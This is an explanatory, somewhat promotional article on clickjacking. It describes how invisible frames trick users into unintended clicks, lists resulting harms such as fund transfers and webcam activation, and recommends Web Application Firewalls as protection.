Think back to when you first learned to use a computer mouse, and everyone likely had the experience of accidentally clicking the wrong icon on their computer. Even today, particularly when user interface elements may be small or overly fussy, it’s possible to select the wrong item with your mouse pointer.
Fortunately, most of the time this causes no problems. If you click the wrong hyperlink on a website, you may be transported to a different page to the one you were expecting, but all it takes is a quick tap of the “back” button and you’re returned to the previous page to rectify your mistake. No harm, no foul.
But imagine if, when you clicked the wrong icon, you were punished by the makers of the software in question — for instance, having a monetary transfer initiated for clicking in the wrong place.
While no legitimate developers would have any reason (or ability) to cause software to behave in this way, cyber attackers are a different matter. Through a form of cyber attack known as click hijacking or “clickjacking,” they are able to use misplaced clicks to trigger damaging actions taking place on the part of the user — ranging from unauthorized transfers of funds or unasked-for product purchases to microphone or webcam activation and credentials theft.
Making matters even worse is that such attacks don’t even play fair by letting users avoid clicking the wrong link: they incorporate invisible frames within web browsers so that a user accidentally clicks these, even when they think they are aiming at another target altogether. Attacks such as this are yet another example of why organizations should incorporate security measures such as a Web Application Firewall (WAF) into their cyber security solutions.
Clickjacking rears its ugly head
The first clickjacking attacks were spotted in the early 2000s, when users realized that it was possible for a transparent layer to be loading over a particular webpage, and for this to then be clicked on without the user being aware that anything was amiss. However, it wasn’t for several more years before users became aware of the major problem that this was able to pose.
Another term for the type of attack is “UI (read: user interface) redressing,” since this describes the process involved with disguising user interface elements so that they might be unknowingly clicked on.
Clickjacking attacks fulfill two key criteria needed for a successful cyber attack. Firstly, they can cause massive amounts of damage for users. Secondly, they can be executed in a way that evades detection, thereby making the attack more likely to be successful. Due to the invisible frame used as part of the attack, victims are unlikely to realize what has happened until later on when the full extent of the clickjacking attack becomes apparent.
Variations of clickjacking
Because a clickjacking attack could conceivably trigger just about any action, there are multiple variations of these attacks that may take place. However, common versions of it can result in the following:
- Causing the user to download malware
- Theft of the user’s login credentials for different websites or services
- Causing the user to make unauthorized transfers of money
- Causing the user to make unsolicited purchases of products
- Sharing the user’s location without their knowledge or express permission
- Causing the user to unknowingly “like” or share a post on social media platforms, thereby helping to spread it online
- Causing the user’s microphone or webcam to activate, thereby granting access to attackers
Not only could this have an obvious detrimental impact on users, but it could also — for understandable reasons — be incredibly damaging to the reputation of the organization supposedly responsible for a particular webpage. This reputational damage could lose customers and even, in some cases, result in financial penalties.
The shifting cyber security landscape
In all, clickjacking is yet another example of the shifting cyber security landscape today. To stay protected, users should make use of the full arsenal of cyber security tools on offer to keep themselves and their users safe.
One important tool is what is known as a Web Application Firewall (WAF), capable of preventing attacks such as those designed to steal data that is considered sensitive. A WAF is able to analyze all traffic to applications online and stop any attacks in their tracks. It’s a smart investment for any organization looking to protect themselves from the worst that cyber attackers have to throw at them.